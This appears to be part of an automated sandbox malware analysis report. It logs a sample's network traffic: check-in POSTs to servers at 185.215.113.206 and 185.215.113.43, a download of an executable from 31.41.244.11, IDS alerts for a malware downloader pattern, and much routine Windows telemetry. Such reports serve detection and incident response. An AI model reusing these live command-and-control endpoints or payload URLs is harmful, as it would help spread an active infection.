Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAKKKFBFIDGDBFHJJEHIHost: 185.215.113.206Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 41 4b 4b 4b 46 42 46 49 44 47 44 42 46 48 4a 4a 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 64 33 36 38 62 32 61 61 62 61 34 63 39 39 63 37 36 63 63 30 64 36 66 30 32 36 37 66 36 31 34 66 30 32 32 32 37 65 37 35 64 31 30 65 31 64 61 61 65 37 39 38 36 32 66 61 30 61 62 38 65 61 35 61 65 32 37 34 61 66 35 0d 0a 2d 2d 2d 2d 2d 2d 43 41 4b 4b 4b 46 42 46 49 44 47 44 42 46 48 4a 4a 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 43 41 4b 4b 4b 46 42 46 49 44 47 44 42 46 48 4a 4a 45 48 49 2d 2d 0d 0a Data Ascii: ------CAKKKFBFIDGDBFHJJEHIContent-Disposition: form-data; name="token"4d368b2aaba4c99c76cc0d6f0267f614f02227e75d10e1daae79862fa0ab8ea5ae274af5------CAKKKFBFIDGDBFHJJEHIContent-Disposition: form-data; name="message"wkkjqaiaxkhb------CAKKKFBFIDGDBFHJJEHI--
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 30 32 39 37 39 42 30 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B02979B05C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic	HTTP traffic detected: GET /files/7995533987/JoYUT4N.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 32 39 31 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1012911001&unit=246122658369

Source: Joe Sandbox View	IP Address: 185.215.113.43 185.215.113.43
Source: Joe Sandbox View	IP Address: 185.215.113.16 185.215.113.16

Source: Joe Sandbox View	ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: Joe Sandbox View	ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: Joe Sandbox View	ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL

Source: Joe Sandbox View	JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View	JA3 fingerprint: 6271f898ce5be7dd52b0fc260d0662b3
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.6:49713 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.6:49808 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.6:49852 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50013 -> 31.41.244.11:80

Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.119.143
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.119.143
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.119.143
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.53.13
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.53.13
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.53.13
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.53.13
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.53.13
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.53.13
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.53.13
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.119.143
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.119.143
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.119.143
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.53.13
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.53.13
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.53.13
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.53.13
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.53.13
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.53.13
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.53.13
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.53.13
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.53.13
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.53.13
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.119.143
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.119.143
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.119.143
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.53.13
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.53.13
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.53.13
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.53.13
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.53.13
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 20.198.119.143
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 20.199.58.43
Source: unknown	TCP traffic detected without corresponding DNS query: 20.199.58.43
Source: unknown	TCP traffic detected without corresponding DNS query: 20.199.58.43
Source: unknown	TCP traffic detected without corresponding DNS query: 20.199.58.43
Source: unknown	TCP traffic detected without corresponding DNS query: 20.199.58.43
Source: unknown	TCP traffic detected without corresponding DNS query: 20.199.58.43
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.53.13
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.53.13
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.53.13
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.53.13
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.53.13
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.53.13
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.53.13
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.53.13
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.53.13

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6CA6CC60 PR_Recv,

0_2_6CA6CC60

Source: global traffic	HTTP traffic detected: GET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=338389&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6&ctry=CH&time=20241207T095054Z&lc=en-CH&pl=en-CH,en-GB&idtp=mid&uid=d215e385-cdc6-4502-a974-fb4c5f95db96&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=3290b30b54024f419717281bf466c3e2&ctmode=MultiSession&arch=x64&betaedgever=0.0.0.0&canedgever=0.0.0.0&cdm=1&cdmver=10.0.19041.1023&devedgever=0.0.0.0&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.19045.2006&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=617972&metered=false&nettype=ethernet&npid=sc-338389&oemName=VMware%2C%20Inc.&oemid=Public&ossku=Professional&scmid=Public&smBiosDm=VMware20%2C1&stabedgever=117.0.2045.55&svcmpt=Red&svgtng=2&svtmexp=1699747200&svtmupd=1696486876&tl=2&tsu=617972&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing=&svoffered=0 HTTP/1.1Accept-Encoding: gzip, deflateX-SDK-CACHE: chs=0&imp=0&chf=0&ds=50543&fs=23594&sc=6X-SDK-HW-TOKEN: t=EwDoAppeBAAUGoFunEzxzyai/T0i5tnZAAR1eX0AAfs5GOX61lVM8UnUOWdIeg/DUKLjZdbZ80HPE+KG0CZg1HHuvFd/HVDp4/sYdYYGDv0Dfq9A2zc5btmMURBMu0e/948OQ3yFE6rvyf+nT5sTGTGA0qpPnPKlgAnX8SHKgwxUD5fjLnELL4hCV9O03UVxeLA16Darc/N64dlJereDvVoSr3zrS5ui1o97pjJ3soR6U4/kvFX2zVqANP1MKyXciMzNUd9wFKN57fw4/tfq6JULpep0i/+orwdesl7HrLwIQmw4XBm6X9Q2hDsNDAU+xZqwgCissp40y+nJfJHmEzcOeTSI1sfavR1kX+nuk6oGhwp9HCs9l3WzMoaI5SIQZgAAEAKEz1xsRdBVqufY2dM+GruwAahH6beixb5LSUXQ9eG50Sb/fnkBHMOZeffB4iHdrrTTu0GhbMzDOm5CxqKaAbokK6vyKv84y9zNcofzmHUKqMORgnV/FEQGwA+Fm08NjHZpoMh8BxRgcM3Adj7B9rSfEguQvGX4qREAwUMNkj/ArRFay24Fxce0kYaGeetHavuSXOvooiG1Wx6sHJI5GP0J9A1wcxLiYVi/dNzS/b7kvzqUc3WfmAmJKtz0CenJPeeLqdRsbEUWLZBNkwnIPaxIbhIMi+wjI1auRnSU6GXZbH0rTkr/E57qBSed+vA7Jo9WvzEZ0+wSNaDfY3cQsq/WkrDbkF58+nQUrmT76m5ttc9cKJWH3Tm3V4O4SEwxx7oS/XExHvNAje6tExWEyMZwOPq/oHLTvPyU70UPlVY8qCAZp6cPUuufbmnHJvC/djPPPNRs992y7EM+wjcrALZnLQz+QfDmAgpQGfmYBJInA2wMuH7W2xwes+xuDghHK8xeZ6rJcCtq1qDx+a6XAbZwORpCHgIO0sPiWuwO1dlRsd09+WX6Ttp+DZsOC7cZK6OkiNF52ltHiqrsxoTs/k5up9gB&p=Cache-Control: no-cacheMS-CV: sdJuoR0mK0isAp6y.0User-Agent: WindowsShellClient/9.0.40929.0 (Windows)X-SDK-HWF: arm0,arm640,ble0,cmb0,cmf0,cmr0,dcb1,dcc1,dx91,dxa1,dxb1,gyr0,hce0,hdc0,hov0,hsa0,hss1,kbd1,m041,m060,m080,m120,m160,m200,m301,m751,mA01,mct0,mgn0,mic0,mrc0,mse1,mT01,nfc0,rs10,rs20,rs30,rs40,rs50,rs60,tch0,tel0,v010,v020,v040,x641,x860,x86a640,xbd0,xbo0,xbs0,xbx0,xgp0Host: arc.msn.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=310091&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6&ctry=CH&time=20241207T095054Z&lc=en-CH&pl=en-CH,en-GB&idtp=mid&uid=d215e385-cdc6-4502-a974-fb4c5f95db96&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=18bf555951664276b833c200b44e0201&ctmode=MultiSession&arch=x64&betaedgever=0.0.0.0&canedgever=0.0.0.0&cdm=1&cdmver=10.0.19041.1023&devedgever=0.0.0.0&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.19045.2006&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=617972&metered=false&nettype=ethernet&npid=sc-310091&oemName=VMware%2C%20Inc.&oemid=Public&ossku=Professional&rver=2&scmid=Public&smBiosDm=VMware20%2C1&stabedgever=117.0.2045.55&svcmpt=Red&svgtng=2&svtmexp=1699747200&svtmupd=1696486876&tl=2&tsu=617972&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing=&svoffered=0 HTTP/1.1Accept-Encoding: gzip, deflateX-SDK-CACHE: chs=0&imp=0&chf=0&ds=50543&fs=23594&sc=6X-SDK-HW-TOKEN: t=EwDoAppeBAAUGoFunEzxzyai/T0i5tnZAAR1eX0AAfs5GOX61lVM8UnUOWdIeg/DUKLjZdbZ80HPE+KG0CZg1HHuvFd/HVDp4/sYdYYGDv0Dfq9A2zc5btmMURBMu0e/948OQ3yFE6rvyf+nT5sTGTGA0qpPnPKlgAnX8SHKgwxUD5fjLnELL4hCV9O03UVxeLA16Darc/N64dlJereDvVoSr3zrS5ui1o97pjJ3soR6U4/kvFX2zVqANP1MKyXciMzNUd9wFKN57fw4/tfq6JULpep0i/+orwdesl7HrLwIQmw4XBm6X9Q2hDsNDAU+xZqwgCissp40y+nJfJHmEzcOeTSI1sfavR1kX+nuk6oGhwp9HCs9l3WzMoaI5SIQZgAAEAKEz1xsRdBVqufY2dM+GruwAahH6beixb5LSUXQ9eG50Sb/fnkBHMOZeffB4iHdrrTTu0GhbMzDOm5CxqKaAbokK6vyKv84y9zNcofzmHUKqMORgnV/FEQGwA+Fm08NjHZpoMh8BxRgcM3Adj7B9rSfEguQvGX4qREAwUMNkj/ArRFay24Fxce0kYaGeetHavuSXOvooiG1Wx6sHJI5GP0J9A1wcxLiYVi/dNzS/b7kvzqUc3WfmAmJKtz0CenJPeeLqdRsbEUWLZBNkwnIPaxIbhIMi+wjI1auRnSU6GXZbH0rTkr/E57qBSed+vA7Jo9WvzEZ0+wSNaDfY3cQsq/WkrDbkF58+nQUrmT76m5ttc9cKJWH3Tm3V4O4SEwxx7oS/XExHvNAje6tExWEyMZwOPq/oHLTvPyU70UPlVY8qCAZp6cPUuufbmnHJvC/djPPPNRs992y7EM+wjcrALZnLQz+QfDmAgpQGfmYBJInA2wMuH7W2xwes+xuDghHK8xeZ6rJcCtq1qDx+a6XAbZwORpCHgIO0sPiWuwO1dlRsd09+WX6Ttp+DZsOC7cZK6OkiNF52ltHiqrsxoTs/k5up9gB&p=Cache-Control: no-cacheMS-CV: sdJuoR0mK0isAp6y.0User-Agent: WindowsShellClient/9.0.40929.0 (Windows)X-SDK-HWF: arm0,arm640,ble0,cmb0,cmf0,cmr0,dcb1,dcc1,dx91,dxa1,dxb1,gyr0,hce0,hdc0,hov0,hsa0,hss1,kbd1,m041,m060,m080,m120,m160,m200,m301,m751,mA01,mct0,mgn0,mic0,mrc0,mse1,mT01,nfc0,rs10,rs20,rs30,rs40,rs50,rs60,tch0,tel0,v010,v020,v040,x641,x860,x86a640,xbd0,xbo0,xbs0,xbx0,xgp0Host: arc.msn.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=280815&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6&ctry=CH&time=20241207T095113Z&lc=en-CH&pl=en-CH,en-GB&idtp=mid&uid=d215e385-cdc6-4502-a974-fb4c5f95db96&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=dd90255ab53d46468c9a0177552d7711&ctmode=MultiSession&arch=x64&betaedgever=0.0.0.0&canedgever=0.0.0.0&cdm=1&cdmver=10.0.19041.1023&devedgever=0.0.0.0&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.19045.2006&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=617973&metered=false&nettype=ethernet&npid=sc-280815&oemName=lubufd%2C%20Inc.&oemid=Public&ossku=Professional&scmid=Public&smBiosDm=lubufd20%2C1&stabedgever=117.0.2045.55&svcmpt=Red&svgtng=2&svtmexp=1699747200&svtmupd=1696486876&tl=2&tsu=617973&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing=&svoffered=0 HTTP/1.1Accept-Encoding: gzip, deflateX-SDK-CACHE: chs=0&imp=0&chf=0&ds=50543&fs=23594&sc=6X-SDK-HW-TOKEN: t=EwDoAppeBAAUGoFunEzxzyai/T0i5tnZAAR1eX0AAZyMFkueVF6YQcCvSNBsYpIs4Qd9uYLd1XThPDga/VMIyCy+eMekKh4VSodnFDQ4n9lrkswnaNY8GYQ0LaPFIJzw8cdDovegxQEKXl3uwbQm7avPmaE22/9yfAjtJ4cL7TShgIQ87Ff8bCnRMjTRO0qGPO/W5zq3MPbRDpKMWsFHc5aDZtEbzuZQGnhsSTStKn842VbaQufNbSd6CdSpqbTxIG43Ig/Eeli/gDioys1MWFcaJqBXmLIogUf3OMZs+D0HT1mDwJTd/tcIfn07Ch6BOteR2+4D6lHkPYbyebVpVVGLe8Kh68xjqfktCQLZ9U0Rh7FfPDkLeF1AQDY7HWEQZgAAELvB9khYUktYC0gLd8ASgH6wAW+Pu+FJ/y3GtjMKW1gkUDUXNmQyQ/i1ijgYr1PAYLWHvCbbCNeSNFROlpoxJ+tjtLRfHCFhWVTMy2fdvAkF7XrzG5KCbs8arX4gUeyy890SjhCZJW3sZScGJEhj1V/VDPnpFsrHjgWdZT+g1n11Dclm5ZDUuKklw0SBsjxerjsLpMokLwUA1f5heiBTKw6cXOpu8cOeeNFjCn7oOt+rd4MoMVuW27Az6B3niPuM8EplRl4EDlX12y1OUSE92MXgSoOvapsw8BTUc5+4lbkyXrG6iPfyW8Jg4fRwFdLVV2aUnuGrw8a3BOQmzO7RZrHOLrPV2pdxCjcC6A59cjYEvikJHBycKMqpdZZiGM4rrgCV4YNPFh4SE+82pbzg3hkebn4ChYs7BiDpWq2PwmR137spkVGyusnf8EKexZPvkev4UH2YuI34Fuhcn0LhLyiN6wC8OX7WsGFimLguB2r+nwV5tRi/TjR+ogoMXP2MYzs3iqeg+v9jK1lHhuHTBwFtek9E6rJEqULB+HiBn4Tv0rKe8PDsvKY5KaTlUlWtylYFbndBiTjf/XzLJCjkwQfIZdgB&p=Cache-Control: no-cacheMS-CV: w2jGzEZSUUq2aGGz.0User-Agent: WindowsShellClient/9.0.40929.0 (Windows)X-SDK-HWF: arm0,arm640,ble0,cmb0,cmf0,cmr0,dcb1,dcc1,dx91,dxa1,dxb1,gyr0,hce0,hdc0,hov0,hsa0,hss1,kbd1,m041,m060,m080,m120,m160,m200,m301,m751,mA01,mct0,mgn0,mic0,mrc0,mse1,mT01,nfc0,rs10,rs20,rs30,rs40,rs50,rs60,tch0,tel0,v010,v020,v040,x641,x860,x86a640,xbd0,xbo0,xbs0,xbx0,xgp0Host: arc.msn.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=338388&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6&ctry=CH&time=20241207T095113Z&lc=en-CH&pl=en-CH,en-GB&idtp=mid&uid=d215e385-cdc6-4502-a974-fb4c5f95db96&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=c06bbfa2e0c44e4cb92d55f7412bd37f&ctmode=MultiSession&arch=x64&betaedgever=0.0.0.0&canedgever=0.0.0.0&cdm=1&cdmver=10.0.19041.1023&devedgever=0.0.0.0&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.19045.2006&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=617973&metered=false&nettype=ethernet&npid=sc-338388&oemName=lubufd%2C%20Inc.&oemid=Public&ossku=Professional&rver=2&scmid=Public&smBiosDm=lubufd20%2C1&stabedgever=117.0.2045.55&svcmpt=Red&svgtng=2&svtmexp=1699747200&svtmupd=1696486876&tl=2&tsu=617973&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing=&svoffered=0 HTTP/1.1Accept-Encoding: gzip, deflateX-SDK-CACHE: chs=0&imp=0&chf=0&ds=50543&fs=23594&sc=6X-SDK-HW-TOKEN: t=EwDoAppeBAAUGoFunEzxzyai/T0i5tnZAAR1eX0AAZyMFkueVF6YQcCvSNBsYpIs4Qd9uYLd1XThPDga/VMIyCy+eMekKh4VSodnFDQ4n9lrkswnaNY8GYQ0LaPFIJzw8cdDovegxQEKXl3uwbQm7avPmaE22/9yfAjtJ4cL7TShgIQ87Ff8bCnRMjTRO0qGPO/W5zq3MPbRDpKMWsFHc5aDZtEbzuZQGnhsSTStKn842VbaQufNbSd6CdSpqbTxIG43Ig/Eeli/gDioys1MWFcaJqBXmLIogUf3OMZs+D0HT1mDwJTd/tcIfn07Ch6BOteR2+4D6lHkPYbyebVpVVGLe8Kh68xjqfktCQLZ9U0Rh7FfPDkLeF1AQDY7HWEQZgAAELvB9khYUktYC0gLd8ASgH6wAW+Pu+FJ/y3GtjMKW1gkUDUXNmQyQ/i1ijgYr1PAYLWHvCbbCNeSNFROlpoxJ+tjtLRfHCFhWVTMy2fdvAkF7XrzG5KCbs8arX4gUeyy890SjhCZJW3sZScGJEhj1V/VDPnpFsrHjgWdZT+g1n11Dclm5ZDUuKklw0SBsjxerjsLpMokLwUA1f5heiBTKw6cXOpu8cOeeNFjCn7oOt+rd4MoMVuW27Az6B3niPuM8EplRl4EDlX12y1OUSE92MXgSoOvapsw8BTUc5+4lbkyXrG6iPfyW8Jg4fRwFdLVV2aUnuGrw8a3BOQmzO7RZrHOLrPV2pdxCjcC6A59cjYEvikJHBycKMqpdZZiGM4rrgCV4YNPFh4SE+82pbzg3hkebn4ChYs7BiDpWq2PwmR137spkVGyusnf8EKexZPvkev4UH2YuI34Fuhcn0LhLyiN6wC8OX7WsGFimLguB2r+nwV5tRi/TjR+ogoMXP2MYzs3iqeg+v9jK1lHhuHTBwFtek9E6rJEqULB+HiBn4Tv0rKe8PDsvKY5KaTlUlWtylYFbndBiTjf/XzLJCjkwQfIZdgB&p=Cache-Control: no-cacheMS-CV: w2jGzEZSUUq2aGGz.0User-Agent: WindowsShellClient/9.0.40929.0 (Windows)X-SDK-HWF: arm0,arm640,ble0,cmb0,cmf0,cmr0,dcb1,dcc1,dx91,dxa1,dxb1,gyr0,hce0,hdc0,hov0,hsa0,hss1,kbd1,m041,m060,m080,m120,m160,m200,m301,m751,mA01,mct0,mgn0,mic0,mrc0,mse1,mT01,nfc0,rs10,rs20,rs30,rs40,rs50,rs60,tch0,tel0,v010,v020,v040,x641,x860,x86a640,xbd0,xbo0,xbs0,xbx0,xgp0Host: arc.msn.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=338387&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6&ctry=CH&time=20241207T095113Z&lc=en-CH&pl=en-CH,en-GB&idtp=mid&uid=d215e385-cdc6-4502-a974-fb4c5f95db96&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=b733a0c8f274419b8bb10c2db25bfff4&ctmode=MultiSession&arch=x64&betaedgever=0.0.0.0&canedgever=0.0.0.0&cdm=1&cdmver=10.0.19041.1023&devedgever=0.0.0.0&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.19045.2006&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=617973&metered=false&nettype=ethernet&npid=sc-338387&oemName=lubufd%2C%20Inc.&oemid=Public&ossku=Professional&rver=2&sc-mode=0&scmid=Public&smBiosDm=lubufd20%2C1&stabedgever=117.0.2045.55&svcmpt=Red&svgtng=2&svtmexp=1699747200&svtmupd=1696486876&tl=2&tsu=617973&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing=&svoffered=0 HTTP/1.1Accept-Encoding: gzip, deflateX-SDK-CACHE: chs=0&imp=0&chf=0&ds=50543&fs=23594&sc=6X-SDK-HW-TOKEN: t=EwDoAppeBAAUGoFunEzxzyai/T0i5tnZAAR1eX0AAZyMFkueVF6YQcCvSNBsYpIs4Qd9uYLd1XThPDga/VMIyCy+eMekKh4VSodnFDQ4n9lrkswnaNY8GYQ0LaPFIJzw8cdDovegxQEKXl3uwbQm7avPmaE22/9yfAjtJ4cL7TShgIQ87Ff8bCnRMjTRO0qGPO/W5zq3MPbRDpKMWsFHc5aDZtEbzuZQGnhsSTStKn842VbaQufNbSd6CdSpqbTxIG43Ig/Eeli/gDioys1MWFcaJqBXmLIogUf3OMZs+D0HT1mDwJTd/tcIfn07Ch6BOteR2+4D6lHkPYbyebVpVVGLe8Kh68xjqfktCQLZ9U0Rh7FfPDkLeF1AQDY7HWEQZgAAELvB9khYUktYC0gLd8ASgH6wAW+Pu+FJ/y3GtjMKW1gkUDUXNmQyQ/i1ijgYr1PAYLWHvCbbCNeSNFROlpoxJ+tjtLRfHCFhWVTMy2fdvAkF7XrzG5KCbs8arX4gUeyy890SjhCZJW3sZScGJEhj1V/VDPnpFsrHjgWdZT+g1n11Dclm5ZDUuKklw0SBsjxerjsLpMokLwUA1f5heiBTKw6cXOpu8cOeeNFjCn7oOt+rd4MoMVuW27Az6B3niPuM8EplRl4EDlX12y1OUSE92MXgSoOvapsw8BTUc5+4lbkyXrG6iPfyW8Jg4fRwFdLVV2aUnuGrw8a3BOQmzO7RZrHOLrPV2pdxCjcC6A59cjYEvikJHBycKMqpdZZiGM4rrgCV4YNPFh4SE+82pbzg3hkebn4ChYs7BiDpWq2PwmR137spkVGyusnf8EKexZPvkev4UH2YuI34Fuhcn0LhLyiN6wC8OX7WsGFimLguB2r+nwV5tRi/TjR+ogoMXP2MYzs3iqeg+v9jK1lHhuHTBwFtek9E6rJEqULB+HiBn4Tv0rKe8PDsvKY5KaTlUlWtylYFbndBiTjf/XzLJCjkwQfIZdgB&p=Cache-Control: no-cacheMS-CV: w2jGzEZSUUq2aGGz.0User-Agent: WindowsShellClient/9.0.40929.0 (Windows)X-SDK-HWF: arm0,arm640,ble0,cmb0,cmf0,cmr0,dcb1,dcc1,dx91,dxa1,dxb1,gyr0,hce0,hdc0,hov0,hsa0,hss1,kbd1,m041,m060,m080,m120,m160,m200,m301,m751,mA01,mct0,mgn0,mic0,mrc0,mse1,mT01,nfc0,rs10,rs20,rs30,rs40,rs50,rs60,tch0,tel0,v010,v020,v040,x641,x860,x86a640,xbd0,xbo0,xbs0,xbx0,xgp0Host: arc.msn.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /th?id=OADD2.10239381714323_11S06446Z442STKF6&pid=21.2&c=3&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1Accept: /Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
